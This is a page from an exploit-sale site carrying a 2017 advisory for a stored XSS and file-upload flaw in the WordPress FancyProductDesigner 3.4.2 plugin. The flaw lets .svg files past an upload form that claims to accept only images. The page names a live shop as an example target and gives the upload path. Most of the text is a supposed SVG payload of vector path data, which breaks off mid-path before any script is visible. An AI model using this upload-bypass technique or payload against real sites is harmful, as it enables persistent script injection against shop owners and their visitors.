0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress FancyProductDesigner 3.4.2 Stored XSS Vulnerability
[+]---------------------------------------------------------[+] | Vulnerable Software: FancyProductDesigner(WP plugin) | | Vendor: http://fancyproductdesigner.com | | Vulnerability Type: Stored XSS + FPD / File upload | | Date Released: 29/04/2017 | | Released by: 5tarboy (@insecurity) | [+]---------------------------------------------------------[+] Fancy Product Designer is a paid wordpress plugin ($50 fee) that allows users to upload custom products of their choice to the site. The upload form claims that it only allows files of PNG and JPG format, but it is possible to upload SVG files also. There are estimated 40,000-50,000 vulnerable sites. In order to replicate this vulnerability you navigate to the product upload page and simply upload an .svg payload. Here is an example: https://www.saltsidecreations.com/product/ozark-20-oz/ It is possible to upload an .svg file via the image upload form - the file will be stored at http://[HOST]/wp-content/uploads/ Here is an example SVG file that can be uploaded (resulting in persistent/stored XSS): ------------------------------------------------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 20010904//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"> <svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="300.000000pt" height="300.000000pt" viewBox="0 0 300.000000 300.000000" preserveAspectRatio="xMidYMid meet"> <metadata> twitter: @insecurity </metadata> <g transform="translate(0.000000,300.000000) scale(0.100000,-0.100000)" fill="#000000" stroke="none"> <path d="M128 2910 c-1 -49 -2 -100 -2 -112 -1 -19 4 -23 27 -23 15 0 27 3 27 8 0 4 0 54 0 112 l0 105 -25 0 c-25 0 -25 -1 -27 -90z m29 -27 c-3 -10 -5 -2 -5 17 0 19 2 27 5 18 2 -10 2 -26 0 -35z m0 -45 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/> <path d="M290 2908 c0 -51 -3 -102 -6 -113 -5 -19 0 -20 85 -20 l91 0 0 113 c0 68 -4 112 -10 112 -10 0 -12 -9 -13 -72 0 -21 -4 -38 -9 -38 -4 0 -8 11 -8 24 0 44 -10 56 -38 49 -20 -5 -23 -3 -17 8 8 12 6 12 -8 1 -9 -8 -21 -11 -27 -7 -6 4 -10 3 -9 -2 1 -4 1 -21 0 -37 -2 -45 -12 -24 -14 28 -2 86 -17 46 -17 -46z m110 -21 l0 -62 -30 -1 -30 -2 0 64 0 64 30 0 30 0 0 -63z m30 -62 c-8 -9 -8 -15 0 -18 7 -4 7 -5 0 -3 -7 1 -11 5 -11 9 1 4 1 22 2 40 0 30 1 31 10 8 6 -16 6 -28 -1 -36z m-90 -16 c0 -5 -7 -9 -15 -9 -15 0 -20 12 -9 23 8 8 24 -1 24 -14z"/> <path d="M600 2888 l0 -113 90 0 90 0 0 113 c0 93 -3 112 -15 112 -9 0 -15 -10 -15 -26 0 -20 -4 -25 -16 -20 -9 3 -18 6 -20 6 -3 0 -3 3 0 8 2 4 -13 6 -35 4 -36 -4 -39 -7 -39 -33 0 -16 -4 -29 -9 -29 -5 0 -6 20 -3 45 4 37 2 45 -12 45 -14 0 -16 -15 -16 -112z m118 -2 c-3 -58 -4 -61 -29 -61 -15 -1 -34 -7 -43 -14 -14 -12 -16 -10 -15 15 0 25 2 26 9 9 7 -18 9 -18 15 -3 4 10 5 41 3 70 l-3 53 33 -3 33 -4 -3 -62z m32 -44 c0 -19 -5 -29 -15 -29 -11 0 -12 4 -5 11 5 5 10 18 10 28 0 10 2 18 5 18 3 0 5 -13 5 -28z"/> <path d="M919 2900 c-1 -55 -2 -105 -3 -111 -1 -8 28 -12 87 -13 l87 -1 0 113 c0 92 -3 112 -15 112 -9 0 -12 -6 -8 -17 4 -11 3 -14 -5 -9 -8 5 -8 -1 0 -24 5 -17 8 -34 4 -37 -3 -4 -6 0 -6 9 0 22 -33 48 -62 48 -38 0 -52 -36 -44 -109 5 -42 4 -61 -4 -61 -7 0 -11 28 -10 83 2 112 1 117 -10 117 -6 0 -11 -41 -11 -100z m111 -14 l0 -65 -29 1 c-30 1 -30 1 -30 65 l0 63 30 0 29 0 0 -64z m34 -69 c-3 -9 -11 -14 -16 -11 -6 4 -5 10 3 15 11 7 11 9 1 9 -7 0 -10 5 -6 11 10 16 26 -5 18 -24z"/> <path d="M1211 2894 l3 -107 -50 -24 c-146 -72 -347 -121 -530 -130 l-122 -6 -6 -45 c-18 -134 -2 -496 30 -687 19 -108 84 -310 119 -365 30 -48 31 -57 5 -65 -11 -3 -20 -13 -20 -21 0 -8 -4 -13 -9 -10 -14 9 -7 34 15 51 16 12 17 14 2 15 -9 0 -23 3 -32 6 -14 5 -16 -8 -16 -110 l0 -116 91 0 c90 0 91 0 85 23 -3 12 -6 25 -6 30 0 15 -20 7 -20 -9 0 -8 -4 -13 -9 -9 -5 3 -12 1 -16 -5 -3 -5 -12 -10 -18 -10 -7 0 -4 5 6 11 11 7 17 22 17 49 0 22 3 40 8 40 4 0 18 -17 32 -37 32 -46 101 -117 165 -168 27 -22 59 -48 69 -57 11 -10 28 -20 38 -24 18 -5 19 -15 16 -115 l-3 -109 33 0 32 0 0 54 c0 69 -10 117 -22 110 -10 -6 -28 12 -28 28 0 9 39 -8 107 -47 l53 -30 0 -57 0 -58 91 0 c68 0 90 3 86 13 -2 6 -13 11 -24 9 -11 -1 -26 4 -33 13 -7 8 -25 15 -41 15 -21 0 -29 5 -30 18 0 9 -3 12 -5 5 -3 -7 0 -21 6 -32 8 -17 8 -19 -4 -15 -19 7 -24 22 -21 67 2 32 -2 38 -27 49 -15 7 -28 16 -28 19 0 3 -18 12 -40 19 -22 7 -45 19 -51 27 -6 7 -18 13 -25 13 -8 0 -13 5 -12 12 2 7 -2 12 -9 13 -14 0 -43 24 -61 51 -7 10 -10 13 -7 7 8 -17 -1 -16 -31 4 -19 12 -22 18 -12 25 10 7 9 8 -3 6 -9 -2 -37 16 -62 40 -26 23 -44 42 -42 42 3 0 -3 9 -12 20 -10 11 -23 20 -31 20 -7 0 -10 5 -6 12 4 7 3 8 -4 4 -7 -4 -12 -1 -12 8 0 9 -4 16 -8 16 -4 0 -16 14 -26 30 -9 17 -27 40 -39 52 -21 20 -21 21 -2 14 17 -5 18 -4 4 6 -19 15 -79 139 -79 162 0 9 -4 24 -9 34 -18 35 -30 68 -40 107 -14 53 -14 68 2 59 6 -4 4 1 -5 12 -9 11 -17 28 -17 39 0 11 -5 54 -11 95 -20 135 -23 183 -23 383 0 183 1 198 19 211 12 9 24 11 35 5 9 -4 18 -6 21 -4 3 3 34 7 69 9 82 6 187 24 212 37 10 6 28 9 38 6 13 -3 17 -1 12 6 -4 8 -1 7 9 -1 13 -10 17 -10 22 3 3 8 17 15 31 15 14 0 25 4 25 8 0 5 6 9 13 9 28 1 97 24 97 33 0 6 3 9 8 9 4 -1 10 0 15 1 10 3 25 7 35 9 4 0 19 12 34 26 15 14 42 28 60 32 18 3 44 17 58 30 13 13 29 23 34 23 5 0 16 7 25 15 9 8 29 27 46 42 16 16 35 27 43 25 9 -2 11 1 7 8 -11 18 34 2 58 -21 12 -10 29 -21 39 -25 10 -3 18 -11 18 -19 0 -7 9 -15 21 -18 13 -4 18 -10 13 -18 -4 -8 -3 -10 4 -5 7 4 12 3 12 -3 0 -6 6 -8 13 -6 17 7 80 -33 72 -45 -6 -10 7 -14 31 -11 6 1 17 -6 24 -14 7 -8 18 -15 26 -15 23 0 64 -23 58 -32 -3 -5 0 -8 7 -7 21 3 79 -13 79 -21 0 -5 10 -6 22 -2 15 4 19 2 13 -7 -5 -10 -2 -11 14 -6 12 4 21 2 21 -4 0 -6 7 -8 15 -5 8 4 22 1 30 -6 9 -7 18 -10 21 -7 3 3 20 1 37 -4 27 -8 129 -16 267 -22 33 -2 35 -4 39 -42 10 -88 4 -486 -8 -585 -7 -58 -13 -115 -13 -127 0 -13 -3 -21 -8 -18 -4 2 -5 -7 -2 -20 2 -15 0 -25 -7 -25 -7 0 -10 -4 -6 -10 6 -9 -39 -178 -51 -189 -4 -3 -3 5 0 19 6 21 5 22 -4 7 -6 -9 -8 -22 -5 -27 6 -11 -41 -117 -62 -138 -7 -7 -13 -18 -13 -23 0 -6 -4 -7 -10 -4 -6 4 -10 -5 -10 -20 0 -17 -7 -29 -22 -35 -13 -5 -19 -9 -14 -9 9 -1 -88 -101 -98 -101 -3 0 -28 -22 -55 -50 -27 -27 -56 -50 -64 -50 -8 0 -22 -11 -31 -25 -9 -14 -24 -25 -34 -25 -14 0 -14 -2 -3 -9 10 -6 27 -1 55 17 52 33 161 127 201 171 16 19 40 46 53 59 l22 25 -1 -39 c0 -21 -3 -34 -5 -27 -8 18 -34 4 -34 -18 0 -17 8 -19 88 -19 l87 0 -3 113 c-3 114 -3 114 -27 109 -15 -2 -22 -9 -18 -18 3 -8 9 -11 14 -8 5 3 9 -5 9 -17 0 -21 -1 -21 -20 -4 -19 17 -19 16 -17 -54 l2 -71 -31 0 c-31 0 -32 0 -29 46 2 28 11 55 23 68 62 69 142 314 168 516 18 136 25 536 11 630 l-8 55 -109 2 c-186 4 -350 41 -528 121 l-83 37 3 94 c2 71 0 95 -10 99 -9 3 -13 -3 -12 -14 1 -11 1 -37 0 -59 l-3 -40 -6 35 c-4 20 -2 39 4 43 6 5 2 6 -9 3 -10 -4 -24 -2 -30 3 -6 5 -21 5 -33 0 -26 -10 -48 -45 -33 -54 5 -3 10 -10 10 -16 0 -5 -9 -4 -20 3 -12 8 -18 19 -14 28 3 8 7 23 9 33 2 9 7 22 10 27 3 6 -4 10 -16 10 -19 0 -21 -4 -16 -35 3 -19 3 -35 -1 -35 -3 0 -21 14 -39 32 l-33 32 -25 -24 c-54 -55 -65 -60 -65 -30 0 18 10 25 33 21 4 0 7 8 7 19 0 15 -7 20 -25 20 -23 0 -25 -3 -25 -48 0 -47 -2 -50 -47 -79 -74 -48 -125 -74 -130 -69 -11 11 7 35 22 30 13 -5 15 7 15 80 0 96 -17 118 -23 29 l-3 -58 -2 58 c-2 44 -5 57 -18 57 -13 0 -15 -15 -13 -106z m489 6 c0 -27 5 -50 10 -50 6 0 10 8 10 17 0 22 6 14 14 -20 6 -26 5 -27 -14 -17 -11 6 -20 9 -20 6 0 -3 -13 7 -29 22 -16 16 -31 41 -33 60 -4 31 -3 32 29 32 33 0 33 0 33 -50z m-990 -1459 c5 -11 10 -40 10 -65 0 -43 -2 -46 -27 -46 -14 0 -35 -7 -45 -17 -17 -15 -18 -15 -18 0 0 10 6 16 13 15 8 -2 13 17 15 65 3 58 5 67 22 67 11 0 24 -9 30 -19z m-78 -83 c-7 -7 -12 -8 -12 -2 0 14 12 26 19 19 2 -3 -1 -11 -7 -17z m1737 -49 c-16 -10 -23 -4 -14 10 3 6 11 8 17 5 6 -4 5 -9 -3 -15z m-1276 -289 c-3 -12 -8 -19 -11 -16 -5 6 5 36 12 36 2 0 2 -9 -1 -20z m-6 -52 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z"/> <path d="M1872 2889 l3 -112 28 -3 27 -3 0 115 c0 97 -2 114 -16 114 -13 0 -15 -14 -12 -95 2 -52 0 -95 -4 -95 -5 0 -8 43 -8 95 0 59 -4 95 -10 95 -7 0 -10 -40 -8 -111z"/> <path d="M2040 2888 l0 -113 30 0 30 0 0 113 c0 117 -16 156 -23 55 l-3 -58 -2 58 c-2 43 -6 57 -17 57 -12 0 -15 -19 -15 -112z m43 -28 c3 -11 1 -23 -4 -26 -5 -3 -9 6 -9 20 0 31 6 34 13 6z"/> <path d="M2220 2888 l0 -113 85 2 c47 1 85 5 85 8 0 3 0 52 0 110 0 63 -4 105 -10 105 -5 0 -11 -17 -11 -37 l-2 -38 -7 40 c-5 30 -8 33 -9 13 0 -15 -6 -30 -12 -33 -6 -4 -9 -31 -8 -62 3 -55 2 -56 -27 -59 l-29 -3 2 62 c1 62 1 62 32 65 38 4 31 22 -8 22 -45 0 -55 -21 -48 -98 5 -51 4 -63 -5 -48 -7 12 -9 48 -5 98 5 65 4 78 -8 78 -12 0 -15 -20 -15 -112z m147 -70 c-2 -13 -4 -3 -4 22 0 25 2 35 4 23 2 -13 2 -33 0 -45z"/> <path d="M2510 2895 c0 -58 0 -108 0 -112 0 -4 12 -7 28 -7 27 0 27 0 25 65 -1 35 -2 85 -2 112 -1 46 -15 64 -24 30 -4 -17 -5 -17 -6 0 0 9 -5 17 -11 17 -6 0 -10 -42 -10 -105z m27 -67 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z"/> <path d="M2690 2901 c0 -55 -2 -105 -5 -113 -4 -10 14 -13 85 -13 l90 0 0 113 c0 68 -4 112 -10 112 -9 0 -11 -9 -15 -62 -1 -26 -15 -34 -15 -10 0 29 -45 59 -64 43 -16 -14 -46 -4 -46 15 0 8 -4 14 -10 14 -6 0 -10 -40 -10 -99z m112 -16 c-4 -64 -4 -65 -30 -62 -26 3 -27 7 -30 65 l-2 62 32 0 33 0 -3 -65z m-85 3 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m119 -57 c-4 -6 -13 -11 -19 -10 -9 0 -9 2 0 5 7 3 9 13 6 22 -5 13 -3 14 7 5 7 -6 9 -16 6 -22z m-112 4 c3 -8 1 -15 -4 -15 -6 0 -10 7 -10 15 0 8 2 15 4 15 2 0 6 -7 10 -15z m99 -32 c-7 -2 -19 -2 -25 0 -7 3 -2 5 12 5 14 0 19 -2 13 -5z"/> <path d="M1490 2762 c-8 -3 -19 -11 -23 -19 -5 -7 -14 -10 -20 -7 -7 4 -9 4 -5 -1 11 -12 -40 -48 -58 -41 -10 4 -14 1 -11 -6 5 -16 -89 -70 -121 -70 -12 0 -25 -5 -29 -11 -4 -6 -1 -7 7 -2 8 5 11 4 6 -3 -3 -6 -20 -13 -36 -17 -16 -4 -32 -11 -35 -16 -4 -5 -22 -9 -41 -9 -19 0 -33 -4 -30 -9 4 -5 -13 -12 -36 -16 -24 -4 -69 -13 -100 -21 -32 -8 -96 -16 -143 -17 -116 -4 -114 -1 -115 -202 0 -161 15 -346 30 -376 5 -9 6 -27 3 -39 -3 -13 -2 -21 3 -18 5 4 10 -11 12 -33 1 -21 11 -58 21 -81 10 -24 16 -49 14 -55 -3 -7 1 -13 7 -13 7 0 9 -9 5 -22 -5 -18 -4 -20 4 -8 9 13 11 13 11 0 0 -20 33 -84 53 -105 9 -8 14 -22 10 -30 -4 -11 0 -14 13 -9 11 4 16 4 13 0 -6 -6 44 -69 88 -110 52 -49 88 -81 93 -81 17 -1 52 -36 47 -48 -4 -10 1 -13 19 -9 14 2 32 -2 42 -11 9 -8 27 -18 40 -22 12 -3 20 -11 16 -16 -3 -5 -2 -8 3 -7 14 4 94 -32 89 -40 -3 -5 8 -7 25 -6 21 1 29 -2 29 -14 0 -14 2 -14 9 -3 7 11 12 10 28 -6 11 -11 31 -18 48 -17 17 1 35 -3 42 -8 8 -7 18 -5 28 6 9 9 22 16 28 16 7 0 29 9 50 20 43 23 51 25 41 8 -4 -7 2 -4 13 8 11 11 41 28 67 38 27 10 43 22 40 28 -4 6 -2 8 3 5 12 -7 139 74 160 101 7 9 13 14 13 10 0 -11 81 75 125 132 22 29 48 61 57 71 9 9 14 20 11 23 -3 2 5 15 16 27 12 13 19 29 17 35 -2 6 2 21 9 31 8 11 22 48 31 81 9 34 21 59 26 56 4 -3 8 -1 8 5 0 5 -4 12 -8 15 -4 3 -6 21 -4 42 3 21 8 31 12 24 18 -30 28 199 20 493 -2 82 -5 100 -21 111 -10 7 -17 15 -14 18 7 7 -27 7 -45 0 -25 -9 -50 -10 -50 0 0 5 -21 8 -47 7 -27 -1 -61 1 -78 4 -92 14 -114 20 -108 30 3 5 1 7 -5 3 -6 -3 -23 -1 -39 6 -15 6 -31 12 -35 13 -5 2 -10 4 -13 5 -7 3 -22 7 -36 9 -5 0 -8 5 -5 10 3 5 -1 12 -10 15 -8 3 -12 2 -9 -4 10 -16 -11 -12 -25 4 -6 8 -19 12 -27 9 -11 -4 -14 -2 -9 5 6 11 2 13 -19 12 -3 -1 -12 5 -20 12 -32 29 -45 39 -45 33 0 -3 -14 7 -31 22 -45 41 -82 61 -99 55z m141 -115 c50 -32 134 -74 211 -105 73 -30 209 -54 304 -56 l102 -1 6 -73 c24 -262 -17 -595 -94 -767 -58 -129 -174 -257 -315 -350 -98 -64 -122 -76 -242 -125 l-95 -38 -68 23 c-117 40 -244 107 -345 184 -217 165 -325 375 -354 691 -19 214 -21 245 -14 341 l6 96 106 6 c151 9 294 48 433 118 77 39 188 111 213 139 l19 21 35 -34 c20 -19 61 -50 92 -70z"/> <path d="M1330 2441 c-104 -26 -140 -41 -140 -57 0 -19 20 -18 89 6 91 30 227 44 316 30 77 -12 98 -9 89 14 -6 16 -3 15 -154 21 -100 3 -140 1 -200 -14z"/> <path d="M1737 2413 c-9 -14 5 -27 44 -41 46 -16 59 -15 59 3 0 22 -92 55 -103 38z"/> <path d="M1377 2373 c-20 -3 -27 -9 -25 -21 2 -11 11 -16 23 -13 11 2 70 3 130 4 154 1 256 -32 368 -117 48 -37 77 -46 77 -24 0 37 -159 128 -276 158 -73 19 -216 25 -297 13z"/> <path d="M1200 2310 c-74 -39 -180 -122 -180 -141 0 -25 33 -19 63 11 40 41 137 105 183 120 23 8 34 17 32 28 -5 26 -20 23 -98 -18z"/> <path d="M1438 2298 c-37 -3 -85 -12 -105 -19 -180 -58 -321 -211 -340 -368 -5 -47 -4 -51 14 -51 17 0 22 9 28 47 11 73 57 163 111 216 97 97 200 138 349 142 77 2 100 6 100 16 0 18 -70 26 -157 17z"/> <path d="M1647 2273 c-14 -13 -6 -22 31 -33 20 -7 57 -23 81 -37 39 -23 45 -24 59 -9 14 14 9 18 -59 51 -72 35 -99 41 -112 28z"/> <path d="M990 2235 c0 -8 5 -15 10 -15 6 0 10 7 10 15 0 8 -4 15 -10 15 -5 0 -10 -7 -10 -15z"/> <path d="M1467 2224 c-21 -21 -3 -32 66 -36 126 -9 221 -58 292 -150 44 -58 65 -124 65 -208 0 -65 2 -70 21 -70 21 0 21 4 17 93 -3 81 -8 99 -38 155 -50 94 -142 167 -250 200 -47 14 -164 25 -173 16z"/> <path d="M1322 2188 c-41 -17 -72 -36 -72 -44 0 -20 14 -18 89 12 78 31 86 37 69 52 -10 8 -32 3 -86 -20z"/> <path d="M1853 2154 c-3 -10 7 -29 29 -52 19 -20 44 -56 54 -79 20 -45 33 -56 53 -43 16 10 -12 66 -69 138 -43 55 -57 62 -67 36z"/> <path d="M772 2135 c0 -16 2 -22 5 -12 2 9 2 23 0 30 -3 6 -5 -1 -5 -18z"/> <path d="M1410 2136 c-69 -19 -111 -44 -159 -94 -52 -54 -80 -113 -81 -164 0 -31 4 -38 20 -38 14 0 20 7 20 23 0 109 106 219 233 242 27 5 37 12 35 23 -4 21 -15 22 -68 8z"/> <path d="M1543 2143 c-27 -9 -12 -32 25 -38 20 -4 47 -10 60 -16 17 -7 24 -5 29 6 3 9 3 18 0 21 -9 9 -102 31 -114 27z"/> <path d="M1173 2088 c-58 -61 -86 -132 -93 -234 -4 -81 -8 -94 -29 -111 -14 -11 -21 -25 -17 -31 11 -19 31 -14 57 14 21 22 25 39 30 118 6 102 29 162 82 216 17 18 27 36 23 45 -8 22 -19 19 -53 -17z"/> <path d="M1695 2070 c-3 -5 11 -26 31 -46 63 -64 76 -108 73 -242 -3 -101 -1 -117 12 -120 25 -5 29 18 26 151 -2 135 -10 158 -76 230 -35 37 -55 45 -66 27z"/> <path d="M1445 2063 c-38 -8 -90 -36 -118 -62 -49 -45 -67 -92 -67 -176 0 -90 -22 -141 -81 -194 -39 -33 -52 -71 -25 -71 23 0 124 117 135 158 6 20 11 66 11 101 0 112 41 170 144 205 61 21 131 9 189 -31 59 -41 77 -86 77 -191 0 -156 -47 -280 -151 -395 -49 -54 -57 -68 -44 -73 19 -8 70 37 124 111 78 106 111 209 111 349 0 116 -16 162 -72 212 -56 50 -155 75 -233 57z"/> <path d="M1424 1970 c-55 -28 -72 -65 -77 -170 -4 -102 -23 -143 -96 -215 -49 -48 -66 -85 -37 -85 19 0 122 113 147 162 15 30 23 70 28 141 6 95 8 100 36 123 23 18 42 24 83 24 46 0 58 -4 83 -29 28 -28 29 -33 29 -119 0 -158 -53 -275 -179 -396 -34 -31 -61 -62 -61 -67 0 -28 45 0 112 69 134 138 162 205 163 384 0 110 -1 118 -25 143 -52 57 -134 70 -206 35z"/> <path d="M1459 1897 c-13 -10 -18 -34 -20 -102 -5 -119 -33 -176 -133 -275 -41 -40 -73 -77 -70 -82 13 -20 40 -3 110 67 96 96 124 156 133 280 5 81 8 90 26 90 18 0 20 -8 23 -64 6 -136 -30 -222 -145 -340 -45 -47 -80 -89 -77 -93 11 -18 33 -4 107 70 111 110 148 187 155 323 4 86 2 102 -13 119 -21 23 -71 26 -96 7z"/> <path d="M1170 1771 c0 -22 -12 -41 -45 -73 -44 -42 -58 -78 -31 -78 18 0 94 83 106 116 16 41 12 64 -10 64 -15 0 -20 -7 -20 -29z"/> <path d="M1774 1603 c-3 -10 -12 -33 -20 -52 -16 -35 -8 -56 17 -46 16 6 51 94 43 107 -9 14 -34 8 -40 -9z"/> <path d="M1595 1330 c-3 -5 -1 -10 4 -10 6 0 11 5 11 10 0 6 -2 10 -4 10 -3 0 -8 -4 -11 -10z"/> <path d="M124 2497 l1 -112 87 -2 88 -2 0 115 0 114 -88 0 -88 0 0 -113z m149 68 c-7 -21 -13 -19 -13 6 0 11 4 18 10 14 5 -3 7 -12 3 -20z m-101 3 c-5 -7 -12 -22 -15 -33 -3 -13 -5 -9 -6 13 -1 23 3 32 15 32 12 0 14 -3 6 -12z m70 -59 c-3 -42 0 -75 6 -81 14 -14 26 30 20 72 -2 16 -1 27 4 24 9 -6 11 -75 2 -98 -3 -9 -15 -16 -26 -16 -10 0 -16 5 -13 10 4 6 -7 10 -24 10 l-31 0 0 65 0 65 30 0 c17 0 30 5 30 10 0 6 1 10 3 10 1 0 1 -32 -1 -71z m-58 -92 c7 -5 3 -7 -9 -5 -13 2 -21 12 -23 28 -2 24 -2 24 9 5 7 -11 17 -24 23 -28z"/> <path d="M420 2497 l0 -114 30 -1 30 -1 0 115 0 114 -30 0 -30 0 0 -113z m31 -24 c2 -23 0 -45 -4 -49 -4 -4 -7 17 -7 46 0 62 7 64 11 3z"/> <path d="M2527 2498 l2 -112 86 -3 85 -3 0 115 0 115 -87 0 -88 0 2 -112z m73 88 c0 -3 -4 -8 -10 -11 -5 -3 -10 -1 -10 4 0 6 5 11 10 11 6 0 10 -2 10 -4z m-30 -15 c0 -6 -4 -12 -8 -15 -5 -3 -9 1 -9 9 0 8 4 15 9 15 4 0 8 -4 8 -9z m108 -18 c2 -12 -1 -30 -7 -40 -8 -14 -9 -8 -4 21 4 27 3 37 -5 32 -6 -3 -14 -1 -17 5 -5 7 0 10 11 7 11 -2 20 -13 22 -25z m-38 -58 l0 -65 -30 0 -30 0 1 65 c2 65 2 65 30 65 29 0 29 0 29 -65z m35 -66 c-4 -11 -15 -19 -26 -19 -11 0 -17 5 -14 10 3 6 13 10 20 10 11 0 13 9 9 33 -4 29 -4 30 6 8 6 -13 8 -32 5 -42z m-106 -7 c1 -7 -3 -10 -9 -7 -5 3 -10 18 -9 33 0 24 1 25 9 7 5 -11 9 -26 9 -33z"/> <path d="M2800 2495 l0 -115 30 0 30 0 0 115 0 115 -30 0 -30 0 0 -115z m40 -31 c0 -34 -4 -53 -10 -49 -5 3 -10 28 -10 56 0 27 5 49 10 49 6 0 10 -25 10 -56z"/> <path d="M123 2140 l-1 -110 29 0 29 0 0 94 c0 52 3 101 6 110 5 13 -1 16 -27 16 l-34 0 -2 -110z"/> <path d="M285 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m147 68 c-2 -10 -6 -18 -8 -18 -2 0 -8 8 -13 18 -7 14 -6 18 8 18 12 0 17 -6 13 -18z m-32 -71 l0 -64 -30 5 c-29 4 -30 5 -30 63 0 59 0 59 30 59 l30 0 0 -63z m37 -27 c4 -48 3 -59 -8 -55 -10 4 -13 21 -11 66 5 74 13 70 19 -11z m-114 -4 c2 -16 12 -35 23 -43 18 -14 18 -14 -6 -11 -27 3 -39 28 -32 66 6 28 10 25 15 -12z"/> <path d="M2510 2140 l0 -110 28 0 27 0 0 110 0 110 -27 0 -28 0 0 -110z m27 -42 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z"/> <path d="M2685 2140 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m135 73 c0 -14 -2 -15 -9 -4 -6 10 -20 12 -45 8 -20 -3 -36 -2 -36 2 0 4 20 8 45 10 38 2 45 -1 45 -16z m-20 -73 c0 -60 0 -60 -30 -60 -30 0 -30 0 -30 60 0 60 0 60 30 60 30 0 30 0 30 -60z m40 44 c0 -8 -5 -12 -10 -9 -6 4 -8 11 -5 16 9 14 15 11 15 -7z m-104 -119 c13 -9 12 -11 -5 -11 -19 0 -21 6 -19 56 1 53 2 53 5 11 3 -25 11 -50 19 -56z m91 73 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m13 -43 c0 -25 -32 -50 -53 -41 -7 2 -4 5 6 5 11 1 20 12 24 31 7 36 23 40 23 5z"/> <path d="M124 1750 l1 -110 88 0 87 0 0 110 0 110 -88 0 -89 0 1 -110z m37 53 c-9 -16 -10 -14 -11 12 0 21 3 26 11 18 8 -8 8 -16 0 -30z m93 21 c5 -14 4 -15 -9 -4 -17 14 -19 20 -6 20 5 0 12 -7 15 -16z m-14 -77 c0 -62 0 -63 -27 -61 -27 1 -28 3 -31 62 l-3 62 31 0 30 0 0 -63z m37 11 c-2 -13 -4 -5 -4 17 -1 22 1 32 4 23 2 -10 2 -28 0 -40z m-13 -85 c-17 -17 -18 -17 -11 0 4 10 7 24 7 30 0 8 3 8 11 0 9 -9 7 -16 -7 -30z m-94 2 c10 -12 10 -15 -4 -15 -9 0 -16 7 -16 15 0 8 2 15 4 15 2 0 9 -7 16 -15z"/> <path d="M420 1750 l0 -110 30 0 30 0 0 110 0 110 -30 0 -30 0 0 -110z"/> <path d="M2525 1750 l0 -110 88 0 87 0 0 110 0 110 -87 0 -88 0 0 -110z m45 66 c0 -23 -16 -27 -17 -5 -1 10 2 19 8 19 5 0 9 -6 9 -14z m101 -3 c5 -97 5 -134 -2 -145 -5 -8 -9 17 -9 59 0 39 -3 78 -6 87 -3 9 -1 16 5 16 6 0 11 -8 12 -17z m-29 -72 c2 -52 0 -67 -9 -60 -6 6 -20 9 -30 7 -16 -3 -18 5 -21 60 l-3 62 30 0 29 0 4 -69z m-85 -23 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z m20 -44 c2 -6 -3 -11 -12 -11 -8 0 -15 7 -15 15 0 15 22 12 27 -4z"/> <path d="M2800 1751 c0 -108 0 -109 25 -113 13 -3 27 -3 30 0 3 3 5 54 5 114 l0 108 -30 0 -30 0 0 -109z m40 -11 c0 -33 -4 -60 -9 -60 -9 0 -14 98 -5 112 11 17 14 6 14 -52z"/> <path d="M641 1634 c0 -11 3 -14 6 -6 3 7 2 16 -1 19 -3 4 -6 -2 -5 -13z"/> <path d="M129 1507 c0 -1 -1 -53 -2 -115 l-2 -112 28 0 27 0 0 105 c0 58 1 108 3 111 1 4 -10 8 -25 10 -16 1 -28 2 -29 1z m28 -99 c-3 -7 -5 -2 -5 12 0 14 2 19 5 13 2 -7 2 -19 0 -25z"/> <path d="M290 1505 c-1 0 -2 -51 -3 -113 l-2 -112 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 2 -82 2z m142 -47 c5 -76 3 -144 -7 -150 -16 -12 -35 -9 -32 5 1 7 -10 13 -26 15 -28 3 -28 4 -25 65 3 59 4 62 31 64 l27 2 0 -70 c0 -44 4 -69 11 -69 8 0 10 26 7 80 -2 44 0 80 4 80 5 0 9 -10 10 -22z m-109 -3 c-3 -9 -8 -14 -10 -11 -3 3 -2 9 2 15 9 16 15 13 8 -4z m10 -144 c10 -11 9 -13 -3 -9 -17 5 -28 59 -20 103 4 22 6 16 8 -25 2 -30 9 -61 15 -69z"/> <path d="M2510 1505 c0 0 -1 -51 -3 -113 l-2 -112 30 0 31 0 -2 112 -3 111 -25 2 c-14 0 -26 1 -26 0z m32 -102 c-5 -83 -9 -90 -11 -20 0 37 2 67 7 67 4 0 6 -21 4 -47z"/> <path d="M2689 1500 c0 -3 -1 -53 -2 -112 l-2 -108 88 0 88 0 -3 111 -3 111 -83 1 c-45 1 -82 0 -83 -3z m42 -43 c-6 -6 -11 -35 -11 -64 0 -29 -3 -53 -7 -53 -8 0 -6 104 2 128 3 7 10 10 16 7 8 -5 8 -10 0 -18z m93 7 